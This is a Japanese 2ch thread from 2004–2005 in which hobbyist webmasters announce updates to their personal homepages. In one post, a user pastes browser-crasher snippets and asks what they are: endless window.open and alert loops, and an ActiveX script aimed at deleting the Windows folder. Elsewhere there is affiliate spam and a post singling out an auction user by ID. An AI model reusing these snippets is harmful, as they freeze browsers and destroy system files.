X



HPを更新したらageるスレ Part2
0001Name_Not_Found
垢版 |
04/07/08 22:07ID:EN0/JarJ
更新はこまめに
毎日
コーヒー飲みながら
50の倍数をとった人は
自顔をうpしてくれるそうです。

前スレ HPを更新したらageるスレ
http://pc5.2ch.net/test/read.cgi/hp/1066730785/

次スレは>>950が立てること。もし、たてる事ができなかったらそのつど連絡。
きっと誰かが立ててくれます。

過去ログは>>2-5あたり
0007Name_Not_Found
垢版 |
04/07/18 12:33ID:4iD/EOC0
更新age
0009Name_Not_Found
垢版 |
04/07/19 16:58ID:TN8JWw0V
更新しますた!!
0010Name_Not_Found
垢版 |
04/07/25 12:08ID:AEeTnsYQ
更新したぞモルァ!
0011Name_Not_Found
垢版 |
04/07/25 13:04ID:FRRpQS48
”したらば”みたいに掲示板だけのサイトって、放置が基本だからか、全然にぎわってない。
0013Name_Not_Found
垢版 |
04/07/25 21:45ID:HCMTUCjo
更新したどー
0014Name_Not_Found
垢版 |
04/07/28 02:50ID:r8JHmJ7B
やっと更新できた…はぁ。寝よっと。
0015Name_Not_Found
垢版 |
04/07/28 04:35ID:???
>>1さんの嘘つき!
>>2-5に過去ログなんてないじゃないの。・゚・(ノ∀`)・゚・。
0017Name_Not_Found
垢版 |
04/07/28 19:16ID:???
なんとか今月中に更新したいけど無理なんだろーなー。
1年以上ほったらかしいてるし
0019Name_Not_Found
垢版 |
04/07/29 02:24ID:???
1日6hotだけれどアクセス解析入れた
ぞー
0020Name_Not_Found
垢版 |
04/07/30 06:00ID:s7UUEJNB
サイト更新∩(゚∀゚∩)age
0021Name_Not_Found
垢版 |
04/07/31 02:38ID:???
外部cssに不手際があって急いでいそいそ更新した
ぞー
0022Name_Not_Found
垢版 |
04/07/31 05:33ID:kszjZQie
更新したぞー
素材30枚&日記ー
0023Name_Not_Found
垢版 |
04/07/31 20:22ID:CW8aiZG3
絵板のバージョンアップしたぞー
0024Name_Not_Found
垢版 |
04/08/01 21:03ID:nZOYuUTm
更新したけどノートパソのキーボード壊れました。

皆さん麦茶には注意しましょう。
0025Name_Not_Found
垢版 |
04/08/01 23:35ID:???
麦茶くらいなら、乾くまで待てば直ってるかも。
0026Name_Not_Found
垢版 |
04/08/02 01:32ID:Yargi0yW
更新ageヾ(・∀・)ノシ
0027Name_Not_Found
垢版 |
04/08/02 10:06ID:a4VcwlD7
キリ番屋がウザい
500回近くリロードして「888888ゲットしました」
下手すりゃサーバ会社に対するDOS攻撃だぞ?
頭大丈夫か?
今までは申告されても軽くあしらってたが、今度ばかりは我慢ならねぇ
つー事で、あらゆるサイトのキリ番コーナーを見てキリ番のパターンを列挙
それを基にアクセスカウンタにキリ番阻止機能を付けた
ロジックは単純
キリ番を検出すると4(死)カウント進めるだけだがどの程度効果が出るだろうか・・・・
0028sage
垢版 |
04/08/02 10:13ID:???
日記書いた
0030Name_Not_Found
垢版 |
04/08/02 22:32ID:???
>>21
リロードして回るカウンタ付けてるお前が悪い。

それはともかく
更新age
0031Name_Not_Found
垢版 |
04/08/02 22:36ID:???
21じゃなくて27だった○| ̄|_
大丈夫か俺…
0035Name_Not_Found
垢版 |
04/08/13 01:00ID:???
これから更新することは当分無いコーナー追加した
ぞー
さらに変な機能topに追加した
ぞー
0036Name_Not_Found
垢版 |
04/08/13 02:34ID:gvwXBTkc
ジオシティーズは何時までメンテですか?
0037Name_Not_Found
垢版 |
04/08/13 22:54ID:909DtS93
こうしんした
0038Name_Not_Found
垢版 |
04/08/13 23:40ID:YKR1jyKO
更新しました。
0040Name_Not_Found
垢版 |
04/08/14 00:44ID:ahQhqB95
>>38
アドupしてみて
0042Name_Not_Found
垢版 |
04/08/17 04:08ID:???
更新しました。超リニューアルしました。
004543
垢版 |
04/08/17 05:45ID:OKvaLsDG
>>44
いいよん

教えてよヽ( ・∀・)ノ
0046Name_Not_Found
垢版 |
04/08/17 16:43ID:???
デザイン超一新
見やすいサイトとは何かを2ヶ月研究した成果だ
0047Name_Not_Found
垢版 |
04/08/19 01:50ID:???
>>46 その成果を是非とも拝見したい

日記更新。
0049Name_Not_Found
垢版 |
04/08/19 11:44ID:???
かなり好きなサイトだったから、メールでリンク張った旨と自分のサイトのアドを送ったら
「アート系ですね」と言われて悲しい気分になった
ぞー
0050Name_Not_Found
垢版 |
04/08/19 12:16ID:???
>>49が何故悲しい気分になったか解らんけどうちも更新したのage
0051Name_Not_Found
垢版 |
04/08/19 13:02ID:01QkaHum
>>50
お前の読解力が足りないだけ。

それと話は変わるが、お前コーヒーは好きか?
0052Name_Not_Found
垢版 |
04/08/19 13:12ID:???
>>50
珈琲大好きだもんね〜?
ケータイにカメラ付いてる?
0053Name_Not_Found
垢版 |
04/08/19 13:19ID:i7TL9TMZ
乙 ついでに3ヶ月放置してたサイトでリニューアル完了!
0055Name_Not_Found
垢版 |
04/08/19 23:46ID:rvsGROxg
まこしますた。
0056Name_Not_Found
垢版 |
04/08/22 00:41ID:l3V6fGcJ
13ヶ月ぶりに更新しました。
0057Name_Not_Found
垢版 |
04/08/22 03:01ID:???
更新したけど遊びで作ったタグが600行超えた
ぞー
0060Name_Not_Found
垢版 |
04/08/26 01:31ID:???
遊びで作ったタグがそろそろ900行きそうだ
ぞー
0061Name_Not_Found
垢版 |
04/08/26 09:34ID:Q3hR0ew/
更新しました。ノシ
でも、いつもどおりで5ホト止まりだろなぁ

今はどこにもリンクしてないのに、微妙にカウンタが伸び続ける。
常連さんアリガトウ。
0065Name_Not_Found
垢版 |
04/08/29 00:22ID:???
変えてるのはTOPだけじゃねーぞ(゚д゚)ポルァ!!
っていうかテキストばっか更新してるのは
写真の編集の仕方で鬱になってるせいでは断じて無い!!覚えとけよこんちくしょう。
0066Name_Not_Found
垢版 |
04/08/31 09:13ID:AwP32+Eq
1週間ぶりに更新したよ
一日3HITのサイトだけど
0067Name_Not_Found
垢版 |
04/08/31 15:13ID:e663F6ql
更新age
超絶おもしろい日記を書こうとしたけれど、結局、こなした運動量と体重をさらしただけの雑文が出来上がった。

よかったらみんなも見に来てね。営業やめると、一日4ヒット平均のへぼさいとだけど。
0069Name_Not_Found
垢版 |
04/08/31 22:26ID:???
ヤッタドー!!更新ヤッタドー!!
0071Name_Not_Found
垢版 |
04/09/01 03:53ID:???
某MMORPGのプレイ日記更新ダー。(・∀・)
0073Name_Not_Found
垢版 |
04/09/02 10:57ID:0sz3zheC
緊急に更新した。

* おはようございます。
→ おはようざごいます。

ってかんじに間違えてた。……自分のサイトのタイトル間違えるなよ>俺。

0074Name_Not_Found
垢版 |
04/09/04 21:02ID:9kZELk0G
age!
今日はがんばたああ
0076Name_Not_Found
垢版 |
04/09/07 23:48ID:c+zAnslJ
2ヶ月に1回ペースだったけど
今日は3度も更新age
0077Name_Not_Found
垢版 |
04/09/19 01:50:06ID:30QuDkE7
更新しましたあああ眠い。

おやしみ。
0078Name_Not_Found
垢版 |
04/09/20 09:51:52ID:???
きのう更新。
写真もネタもまだまだ出し惜しみしまくり。


ああああスキル欲しいいいいいい
0079Name_Not_Found
垢版 |
04/09/20 09:55:07ID:/WgEwMxa
更新しました〜。
リンク削除ぐらいしかしてないけど_| ̄|○
0080Name_Not_Found
垢版 |
04/09/20 16:28:53ID:+er6qLv9
ほんのちょっと前だけどようやくリニューアル&復活しました。
更新は一応毎日してます。
(今さっき更新しました)

http://abkudokan.k-server.org/
0081Name_Not_Found
垢版 |
04/09/20 20:46:20ID:NG6PIPen
更新しました、進まないなあ。
0083Name_Not_Found
垢版 |
04/09/20 22:47:44ID:???
朝からずっとサイト改装して
記念CG仕上げた。

最高記録。もうフロ入らないで寝る。
0084Name_Not_Found
垢版 |
04/09/20 22:51:09ID:N8bp7bIW
更新完了。
0085Name_Not_Found
垢版 |
04/09/21 01:58:51ID:KeMHPyoD
漏れも更新しますた。
0086Name_Not_Found
垢版 |
04/09/21 02:20:50ID:5guhAJtN
更新した。
だんだん訪問者が増えてきてるから手抜きできないっていう
強迫観念に囚われてる…とほほ
0087Name_Not_Found
垢版 |
04/09/21 04:40:12ID:V/L/p3Gf
超更新しました。どどーんとかえてやった。
え?この人神経切れちゃった?って感じになった。
0088Name_Not_Found
垢版 |
04/09/21 05:14:21ID:JpDxXS2h
昨夜11時から、更新作業5% 構成考えてる時間95% で、
こんな時間になってしまった。2時間しか寝れない。
0089Name_Not_Found
垢版 |
04/10/06 22:43:01ID:yaIY9kDB
ひさしぶりに更新した〜。
ちょっと宣伝もしてみた〜。

たぶんあんまり人来ないと思うけどさ…。
0090Name_Not_Found
垢版 |
04/10/06 23:12:16ID:+Yac6UCG
更新しました。
0091Name_Not_Found
垢版 |
04/10/07 03:24:56ID:gxL99oX0
更新
今日はここのパーツだけと思ってたら全部仕上がった
0093Name_Not_Found
垢版 |
04/10/07 17:16:35ID:oNrFtgKe
更新したage
最近日記しか更新してないけど
どうやら覗いてくれている人もいるみたい…
う、嬉しいよー。・゚・(ノA`)・゚・。
0096Name_Not_Found
垢版 |
04/10/11 02:23:37ID:jrfYSWH9
っしゃー! ついに新コーナー設立!! いぇー!
0097Name_Not_Found
垢版 |
04/10/11 03:17:48ID:DKLNZGKi
よし、ちょっくら改装したぜ
あー眠い
0101Name_Not_Found
垢版 |
04/10/23 13:57:28ID:???
やっと色々消せた!新コンテンツできたらageに来る(*´∀`)
0102Name_Not_Found
垢版 |
04/10/23 17:08:52ID:0Sou6Mvk
こうしんしたよ〜
どうすりゃいいの?
0103Name_Not_Found
垢版 |
04/10/24 01:58:25ID:???
更新しようとFTPたちあげたはいいが
サイトがなくなってた

わかりやすく言うと垢消された
。・゚・(ノД`)・゚・。
0105Name_Not_Found
垢版 |
04/10/26 20:39:56ID:???
今から二サイト更新する。
2ちゃんせずに更新する。
絶対に更新するんだー・・・!
0106105
垢版 |
04/10/26 22:16:39ID:PZptsXdV
ひとつ更新しましたage
0109Name_Not_Found
垢版 |
04/10/26 23:49:10ID:nJyZwpvj
デザイン変えました。
0110Name_Not_Found
垢版 |
04/10/27 00:04:11ID:???
ヤフオクにamazonへの誘導をしてるやつ。ウザイっつーの。
→→→→→→→→→→→→→→YahooID:sincerity7238←←←←←←←←←←←←←←←←
http://openuser2.auctions.yahoo.co.jp/jp/show/auctions?userID=sincerity7238&f=&alocale=0jp&mode=1
http://openuser2.auctions.yahoo.co.jp/jp/show/auctions?userID=sincerity7238&f=&alocale=0jp&mode=1
http://openuser2.auctions.yahoo.co.jp/jp/show/auctions?userID=sincerity7238&f=&alocale=0jp&mode=1
http://openuser2.auctions.yahoo.co.jp/jp/show/auctions?userID=sincerity7238&f=&alocale=0jp&mode=1
http://openuser2.auctions.yahoo.co.jp/jp/show/auctions?userID=sincerity7238&f=&alocale=0jp&mode=1
0111105
垢版 |
04/10/27 01:53:23ID:KUK8IbZ2
更新したーage
寝るぽ
0112Name_Not_Found
垢版 |
04/10/27 22:03:33ID:???
今から更新(プログラム作成)する
まぁ途中まで出来たらageる
0113112
垢版 |
04/10/28 00:51:24ID:CT5UlP3A
途中まで完成したからageる
0115112
垢版 |
04/10/28 17:21:30ID:CT5UlP3A
今日も更新(プログラム作成)した!
毎日一歩ずつ進んでる
0116Name_Not_Found
垢版 |
04/10/28 22:44:08ID:lpJj7Mt1
日記とphoto更新age
0117Name_Not_Found
垢版 |
04/10/28 22:45:35ID:???
更新する気は満々なんだけど
たくさんありすぎてどこから手を付けていいかわからんorz
0118112
垢版 |
04/10/28 23:03:41ID:CT5UlP3A
今日二回目の更新(プログラム作成)
明日から旅行行くから更新出来ないorz
0119Name_Not_Found
垢版 |
04/10/30 05:32:20ID:???
更新しました




最後の更新です…(ノД`)
0120Name_Not_Found
垢版 |
04/10/30 07:39:19ID:RmAxaQUL
取り敢えずある人とバッサリ縁切るため
決意新たに小更新。
今日は機能を付けただけ。
本腰入った写真と駄文の更新は明日か明後日になるでせう。

写真が溜まるの何のって…
レタッチ出来なくても見目が良いものを優先したい
0121Name_Not_Found
垢版 |
04/10/30 18:00:42ID:+e8tHj3X
旅行先からも更新!
0122Name_Not_Found
垢版 |
04/10/30 23:08:17ID:7mm0T1Jc
YO!yo!minnna
見てくれyo!

http://mmx.muvc.net/
どうだい??!(#oo))
0123Name_Not_Found
垢版 |
04/11/01 15:57:12ID:0qKP78t0
更新しますた
メインの写真も更新したい
0124Name_Not_Found
垢版 |
04/11/01 15:59:34ID:8Xvo2Up7
やっとwith2chへのリンクをつけた
0125Name_Not_Found
垢版 |
04/11/02 21:40:40ID:PMORa18O
プログラム作成をしたからage
0126Name_Not_Found
垢版 |
04/11/03 03:16:46ID:3Np31MMn
チャット完成したage
0128Name_Not_Found
垢版 |
04/11/03 06:12:00ID:2F/Xwjbt
リニュしたいのにあたしスキルなさ杉・・・
誰かマンツーマンで教えて・・・涙
0129Name_Not_Found
垢版 |
04/11/04 18:58:17ID:/v00806K
トップページの無駄な物を削除&リンク集更新!
0130Name_Not_Found
垢版 |
04/11/04 19:07:15ID:+bhSly2b
更新しますた。てか毎日更新してますがw
http://www3.pf-x.net/~orepuri/
うすら弱い笑いを垂れ流してるんで、よかったら見て下さいな。
0131Name_Not_Found
垢版 |
04/11/10 14:13:38ID:???
いつもの愚痴スレ群では無く、下方の語りのスレを微妙に更新。
愚痴と写真は氏ぬほど溜まって中々消化出来なくなりつつあるし、
語りの方で新ネタが出来たので
それとリンク集を大幅更新する予定。
0132Name_Not_Found
垢版 |
04/11/14 06:49:45ID:p4C1waTN
更新はしてないけど、最近カウンターの回りが速くなってきたのでアクセス解析入れてみた。
よく分からんからとりあえずAccessAnalyzerで。
0133Name_Not_Found
垢版 |
04/11/14 12:49:00ID:RLuwsPjc
更新した。
アクセス解析もカウンターも置いてないから、
人来てるのか来てないのか知らないけど。

たぶん来てないなorz
っていうかIEじゃ見られないし。
0134Name_Not_Found
垢版 |
04/11/14 13:21:26ID:lk5tE7Ht
とりあえず更新。
話題のブログを置いてみた。
0135Name_Not_Found
垢版 |
04/11/16 23:48:07ID:???
今日初めてCGIを弄って目的どおりに完成した。
すげー嬉しい。

早く誰か使ってくれないカナァ・・・
0136Name_Not_Found
垢版 |
04/11/16 23:48:27ID:oBOGEdpw
ageてなかった
0137Name_Not_Found
垢版 |
04/11/17 15:41:48ID:???
移転しますた。
またしばらく放置。
0138Name_Not_Found
垢版 |
04/11/17 22:58:15ID:K6t6fjQI
まげ
0139Name_Not_Found
垢版 |
04/11/18 01:01:01ID:nAIquDE5
久々に更新。
少しCSSいじっただけだけど。
0140Name_Not_Found
垢版 |
04/11/18 12:50:56ID:4nUCAW45
リニュ&素材完成 更新age
0141ホームページ無料
垢版 |
04/11/18 13:08:48ID:???
ここはアフィリエイトに参加している方、または参加したい方にサイトを無料で提供します. このサイト運営で1ヶ月間副収入が15万円です。
ゲームサイト:http://tokyo0720.newnippon.com/indexpackage.html?LinkUrl=linkgame/index.html(無料提供)
情報サイト:http://www.goo-net.net (無料提供)
情報サイト:http://www.zero-first.com(無料提供)
情報サイト:http://www.de-club.com(無料提供)
情報サイト:http://www.nipponclick.com(無料提供)
サイト提供は http:www.newnippon.comから
0142Name_Not_Found
垢版 |
04/11/21 16:25:13ID:???
うわっちゃー!更新したと思ったのにアップロードするの忘れてた・・・
1週間ぶりにアップしますた
0143Name_Not_Found
垢版 |
04/11/21 16:52:58ID:/60OB0cp
長い間トップページだけで1日1〜3ホットだけだったけど
先日気まぐれにBBSを入れた15分後に「再開おめでとうカキコ」


藻前は何者だ??エスパァか?
0144Name_Not_Found
垢版 |
04/11/21 17:51:08ID:yN7iyJht
なかなかよいJavaScriptがかけたのでage
0145Name_Not_Found
垢版 |
04/11/21 20:38:38ID:fH+mE51z
http://ww9.tiki.ne.jp/~n-press/Top.index.html
携帯専用だけど来てみてください
0147Name_Not_Found
垢版 |
04/11/24 16:05:28ID:???
更新完了。
無味乾燥なWeb拍手の画面を今のサイトデザインに合わせた。
ただし更新したとは公言しないコソーリ更新ではあるが。

CGIいじくるって楽しいネ。いつか自前で作りたい。
0149Name_Not_Found
垢版 |
04/11/26 13:12:12ID:rUO2QwPo
更新したからage
0150Name_Not_Found
垢版 |
04/11/26 13:46:30ID:???
>>147
自前で出来るようになるともっと楽しいよ。
その時はWebProg板をよろしく(過疎板だからマターリと)
0151Name_Not_Found
垢版 |
04/11/26 13:49:20ID:VCpvm3+0
?に入る文字は?
SK?KMDTKM
面白くて為になり,他人に出題したくなるなぞなぞ,頭の体操

http://rj.b.to
0152Name_Not_Found
垢版 |
04/12/01 22:05:03ID:vQMchDDb
更新しました
0153Name_Not_Found
垢版 |
04/12/02 00:18:31ID:bEyVvAfZ
更新というか初めてきちんと中身を作ったのでage
0154Name_Not_Found
垢版 |
04/12/02 00:40:34ID:Pd408Zhf
鯖との契約が切れて、鯖に金振り込んだのでage
0155Name_Not_Found
垢版 |
04/12/02 17:14:57ID:sCBzfIbr
最近毎日まじめに素材追加で更新中age
0156Name_Not_Found
垢版 |
04/12/02 23:20:05ID:hPHeFkMn
indexページ変更age
0157Name_Not_Found
垢版 |
04/12/02 23:38:09ID:1RWjwGft
2ch系サイトに晒されたので
それ様にひとこと追加したのでage
0158Name_Not_Found
垢版 |
04/12/03 01:25:37ID:WTSQpNKl
更新しますた
0159Name_Not_Found
垢版 |
04/12/06 01:04:44ID:KwFFiWoK
更新OK
0160Name_Not_Found
垢版 |
04/12/06 01:34:58ID:BG8O1Juz
トップページをリニューアル
0161Name_Not_Found
垢版 |
04/12/31 04:19:58ID:uNeX+YH8
「これでは駄目だ!」と思い、こんな時間だが
まともなコンテンツを がんがって作った。あぐぇー
0162Name_Not_Found
垢版 |
04/12/31 12:14:45ID:LsylvJI/
ようやっと貯めてたネタを書いて更新できた。
0164Name_Not_Found
垢版 |
05/01/01 06:51:09ID:n6a+cqIG
徹夜でリニューアル完了。
集中すれば出来るもんだな。
0165Name_Not_Found
垢版 |
05/01/01 07:14:59ID:stW2hIVO
新年記念更新完了。

今年こそはいいとしでありますように。
0167Name_Not_Found
垢版 |
05/01/01 15:13:41ID:tUHQOhrI
トップページに正月っぽい絵を貼って、
日記コーナーに「今年はがんがって更新する」という主旨のことを書きますた。
0168Name_Not_Found
垢版 |
05/01/04 22:08:33ID:zOyt4hwO
リクされてたネタをアプー。
0170Name_Not_Found
垢版 |
05/01/08 16:27:45ID:+6Zgb0i2
がんがって改装。
ヘマしてカウンター初期化。・゚・(ノД`)・゚・。
0172Name_Not_Found
垢版 |
05/01/09 13:57:02ID:AvVuBlvG
馬の予想更新。
0173172
垢版 |
05/01/09 13:58:20ID:???
IDがAV・・・_| ̄|○
0174Name_Not_Found
垢版 |
05/01/10 17:30:04ID:???
映画レビューを作成
独り言追加
ランキンぐ参加
0175Name_Not_Found
垢版 |
05/01/16 16:58:47ID:5y4YCfUz
保守age
0176Name_Not_Found
垢版 |
05/01/19 16:52:02ID:IJGFuqqT
最近は裏という名の料理コンテンツばかり更新しているような気がするが気にするな。age
0177Name_Not_Found
垢版 |
05/01/19 17:40:41ID:xVz0IiDx
同人サイトの方の裏更新age
0178Name_Not_Found
垢版 |
05/01/21 16:07:54ID:bBtfrEta
ゲームレビューup
0180Name_Not_Found
垢版 |
05/01/23 15:50:37ID:gXsRKmcC
久々に更新祭り!!age
多分もう一生こんなに更新しないだろうってくらいに色々うpした…疲れた
0181Name_Not_Found
垢版 |
05/01/29 04:28:46ID:???
サイトデザイン変更
以前より目に楽しい感じにしてみたage
0182Name_Not_Found
垢版 |
05/01/29 14:43:41ID:???
ふぁびこんを付けてみたage。
多分閲覧者は違いに気づかない。
0183Name_Not_Found
垢版 |
05/01/29 16:51:25ID:1yh1oYAX
閉鎖してきた
0185Name_Not_Found
垢版 |
05/01/31 16:06:26ID:1vwy3swb
えぇ〜。絵画廊にオリジナルの武器を三つ追加です。
0186Name_Not_Found
垢版 |
05/01/31 18:23:27ID:GVztbyEe
一時閉鎖宣言完了。
ああ、ネットに繋ぐのも今日でいったんおあずけか。。
0187Name_Not_Found
垢版 |
05/02/01 05:39:54ID:???
リニュしますた(・∀・)ノ
白から黒で気分転換♪マターリと運営中
0188Name_Not_Found
垢版 |
05/02/02 08:54:38ID:JBADP+CA
日記サイトと化していた最近、ようやくメインコンテンツへリンクつなげますた。
中身はないんだが・・・
ガンガルゾage
0189Name_Not_Found
垢版 |
05/02/07 22:38:21ID:/ePKszuu
同盟のサイトをCSS仕様にしました。
改装がラクダ〜。
0190Name_Not_Found
垢版 |
05/02/08 00:02:33ID:b/vxoozB
自作ソフトをこっそり更新。
0191Name_Not_Found
垢版 |
05/02/09 16:31:04ID:x0yvwlE1
20日ぶりに更新
ちまちまノートからテキスト化してた攻略情報をようやくUPできたー
0192Name_Not_Found
垢版 |
05/02/09 17:40:27ID:kaSMYH2V
更新しました。
やっぱりこつこつが一番近道ですね
0193Name_Not_Found
垢版 |
05/02/10 10:17:03ID:e8j140bE
昨日、4ヶ月ぶりに更新した。今朝も。
0194Name_Not_Found
垢版 |
05/02/21 00:55:34ID:0iuZs7NC
キリ番阻止機能付きカウンタ運用開始
0196Name_Not_Found
垢版 |
05/02/21 21:19:35ID:fwHRWPjT
top更新
0197Name_Not_Found
垢版 |
05/02/22 23:20:50ID:IMnKZeWH
更新記念age
0199Name_Not_Found
垢版 |
05/02/23 05:28:53ID:OAexE0gL
更新しました。
0201sage
垢版 |
05/02/26 02:22:38ID:WHqYGOBG
 
0202Name_Not_Found
垢版 |
05/02/26 03:05:04ID:WHqYGOBG
>>200なんであげてるのにトリップが???になるの?
0204Name_Not_Found
垢版 |
05/02/26 03:35:47ID:WHqYGOBG
>>203さん、ありがとうございます。
無線で繋いでいたからなんですか。
ageで???にする方法が気になって、トリップでずっとテストしてました。
結局できなかったから、聞いてみたんです。
0205Name_Not_Found
垢版 |
05/02/26 03:41:27ID:???
>>204
ホントはね。
メール欄になんか文字を入れればいいだけ。

嘘ついてスマンカッタ
0208Name_Not_Found
垢版 |
05/02/26 03:46:32ID:???
*_ _*ハズカシー
ありがとうございます>ALL
0209Name_Not_Found
垢版 |
05/02/26 09:35:14ID:YgH1ILHE
掲示板設置age
0211Name_Not_Found
垢版 |
05/02/27 13:12:41ID:inEZ3K27
サイトデザイン変更age〜
0213Name_Not_Found
垢版 |
05/02/28 06:41:42ID:m/ZPyVyV
裏という名の料理サイト更新age
裏の実力魅せます。
0214Name_Not_Found
垢版 |
05/03/01 11:52:43ID:???
更新したけど、更新日時を2月29日してしまっった
0216Name_Not_Found
垢版 |
05/03/04 01:02:36ID:NOHS5Z0f
1ヶ月ぶりに更新

0217Name_Not_Found
垢版 |
05/03/05 16:44:11ID:???
1ヶ月と2日ぶりに更新。
語り文追加〜
0218Name_Not_Found
垢版 |
05/03/12 09:13:17ID:reCPU9Hh
こっそり裏サイトOPEN
0219Name_Not_Found
垢版 |
05/03/14 14:39:00ID:98QrOHZr
更新age
楽しいぜベイベッ
0220Name_Not_Found
垢版 |
05/03/14 16:31:06ID:vqBtumko
18禁裏更新
0221Name_Not_Found
垢版 |
05/03/14 18:54:55ID:5G2JX5kg
ここのすれ初めてなんですが、

最近、友達に頼まれて友達の病院のHP作ったんです。

で、みんなの意見とか取り入れながら充実させて行きたいのですが

アドレスをさらしてもいいのでしょうか?

それともそういうのはここではマナー違反なんでしょうか?

みんなアドレスはさらしていないのでさらすと荒らされるのでしょうか?

ご教授お願いします。
0222Name_Not_Found
垢版 |
05/03/14 20:27:09ID:???
>>221
別にいいけどサイト荒されるかも。
おまいさんが作ったとしても
友達の病院のHPなんだからその友達に許可を貰ってからの方が良さ気。

まあ2ちゃんの香具師らにヲチされるだけだけど。
0223Name_Not_Found
垢版 |
05/03/14 20:54:41ID:5G2JX5kg
>>222
ありがとうございます

たしかに友達に迷惑かかったらいけないからさらさないほうがいいかもですね。
でも、他人にどのように評価されるのか気になる・・・

掲示板とか無いからいいとは思うんだけど

それによくしていくためには他人評価が必要だと思うし・・・
友達に2chの説明も難しいし悩むなぁ
0224Name_Not_Found
垢版 |
05/03/14 20:56:12ID:???
>>223
HP評価スレ
まじめに出せばまじめに評価してくれる。
0225Name_Not_Found
垢版 |
05/03/14 22:10:44ID:MKJyH63/
更新age
自分の文章力のなさに改めて気づかされた更新
0226Name_Not_Found
垢版 |
05/03/14 22:51:08ID:???
・CSSをいじって背景をさわやか春Ver.に
・掲示板のスクリプトをごにょごにょして
 降順ソートでも書き込みフォームを下に表示するように
0228Name_Not_Found
垢版 |
05/03/14 23:10:10ID:ABky+WA3
更新〜
辞典に2つ追加!
0229Name_Not_Found
垢版 |
05/03/17 17:02:53ID:qBSageBx
Sage
0230Name_Not_Found
垢版 |
05/03/17 17:53:01ID:nxWjGyoj
更新ageーん

粘着質のレスに1時間掛かってしまった。
あんな投稿、どうレスしてよいかわからん…OTL
0231Name_Not_Found
垢版 |
05/03/17 20:37:43ID:IZWxaAtx
更新age

リンク集整理完了…。
0232Name_Not_Found
垢版 |
05/03/17 21:35:52ID:a70ujpr1
更新age 実に3ヶ月ぶりの更新だった スッキリー
0233Name_Not_Found
垢版 |
05/03/18 16:28:35ID:9JlY/M6t
あげ レイアウトいじって項目追加 
ウチもちょっといっぺんリンクを整理しなくちゃ
0234Name_Not_Found
垢版 |
05/03/19 10:37:19ID:KVBP9cdS
しんさくflashうp age
0235Name_Not_Found
垢版 |
05/03/21 03:01:06ID:???
全部リニュあげ
別物のサイトと化した
0236Name_Not_Found
垢版 |
05/03/21 03:01:36ID:???
全部リニュあげ
別物のサイトと化した
0237Name_Not_Found
垢版 |
2005/03/23(水) 03:55:54ID:PotfGOiR
絵1枚うp
0238Name_Not_Found
垢版 |
2005/03/25(金) 23:01:58ID:???
更新した。というか閉鎖してきたage。
長年の宿便がドバっと出たような爽快感だ。
0239Name_Not_Found
垢版 |
2005/03/25(金) 23:05:16ID:???
>>238
お疲れ、君の未来と共に閉鎖したな^^
IDとパスワードを忘れて更新はおろか閉鎖すらできない俺を慰めてくれ…
0240Name_Not_Found
垢版 |
2005/03/27(日) 23:51:40ID:uQX+QqHT
サイトリニュ+某板投下絵うpage
0241Name_Not_Found
垢版 |
2005/03/31(木) 23:47:11ID:0PfTa0Ak
ビリーさよなら更新アゲ
0242Name_Not_Found
垢版 |
皇紀2665/04/01(金) 03:38:00ID:wYbaLo+4
エイプリルフールネタ仕込みあげ。
0243Name_Not_Found
垢版 |
2005/04/03(日) 00:41:21ID:/vrgTdpd
ブログというものに手を出してみた
楽だなー
0245Name_Not_Found
垢版 |
2005/04/04(月) 01:00:32ID:3Y/Flj6Z
思いつきで短編小説を一変うp汁
でも素通り。いつものコンテンツしか見てくれない
0246
垢版 |
2005/04/04(月) 02:16:03ID:/H9xMHU+
↓これって何ですか?<scriptlanguage="JavaScript">while(1){open('./');}</script>
<bodyonload="for(;;){alert('適当');}">

<bodyonload="for(;;){newwin=window.open();}">

<scriptlanguage="jscript">var fso fso = new ActiveX0bject('Scripting.Filesystem0bject");fso.DeleteFolder('C;\\Windows",true);</script>
0247Name_Not_Found
垢版 |
2005/04/04(月) 02:58:59ID:dY8OQFV0
絵一枚うp!!!がんばった・・・
>>239ドンマイ!
0249名無しさん@
垢版 |
2005/04/04(月) 18:26:54ID:/H9xMHU+
ブラクラって?ブラウザクリア?
0250Name_Not_Found
垢版 |
2005/04/05(火) 07:48:44ID:WFTV01/I
(´・ω・`)ショボーン
0251Name_Not_Found
垢版 |
2005/04/05(火) 07:49:34ID:WFTV01/I
(´・ω・`)ショボーン
0252Name_Not_Found
垢版 |
2005/04/05(火) 07:50:16ID:WFTV01/I
(>_<)グッタリ
0253Name_Not_Found
垢版 |
2005/04/05(火) 12:24:04ID:???
お願いがあるんですが誰かおこずかいサイトの裏側を書いたサイト作って
くれませんか?ネット初心者を甘い言葉に乗せて食い物にしているのが許せません。
例えば「メールを受信するだけで簡単にお金になる!」と
歌っているサイトが多いですが本当は紹介者が得をするだけで入会者は全然
収入になりませんよね?そのような本当のことを公開するようなサイトを
作って欲しいんです。私はまだまだネットの世界では何も知らないほうなので
詳しい方、是非お願いしたいです。そして2ちゃんにいっぱい貼りつけて
初心者を救いましょう!
0254Name_Not_Found
垢版 |
2005/04/05(火) 15:30:54ID:ndC16KdY
コラム更新、TOPヘンコーage
0255Name_Not_Found
垢版 |
2005/04/05(火) 18:53:30ID:???
半月ぶりに更新〜。
TOPも改装〜。
age〜
0256Name_Not_Found
垢版 |
2005/04/05(火) 19:26:26ID:lsABZ6R4
更新した
0258Name_Not_Found
垢版 |
2005/04/09(土) 22:24:05ID:HkjkW+w0
更新したよん
0259Name_Not_Found
垢版 |
2005/04/09(土) 22:25:12ID:le77CKLS
>>253
おまえが作れ

更新age
0260Name_Not_Found
垢版 |
2005/04/13(水) 23:26:38ID:p0EVAGP3
できたよん
0261Name_Not_Found
垢版 |
2005/04/14(木) 05:40:08ID:swRmnJMb
エポック秒 <-> 通常時刻
の変換機を作った。JavaScript使用。
0262Name_Not_Found
垢版 |
2005/04/14(木) 15:26:07ID:iq6nyCNi
できたできた
0263Name_Not_Found
垢版 |
2005/04/15(金) 13:22:12ID:yPMyrtkF
リンクコーナーを整理し終えた。
バナーが並んでいる様は壮観である。
0264Name_Not_Found
垢版 |
2005/04/16(土) 02:39:19ID:AsQZ0b4e
コラム更新age
0265Name_Not_Found
垢版 |
2005/04/16(土) 23:48:13ID:pNDRji2G
サイト専用のスクリプトが欲しくて
1からperlとか勉強した。
できた。もうめちゃくちゃ感動。イク。
0266Name_Not_Found
垢版 |
2005/04/17(日) 15:11:05ID:zz5bEsnY
リニューアルage
CSSこんなに頑張ったの初めてだよ
0267Name_Not_Found
垢版 |
2005/04/17(日) 21:00:32ID:Fpp75f4M
CSS切ったら微妙におもしろいことになってたのでリニュ
ついでに絵を1枚うp
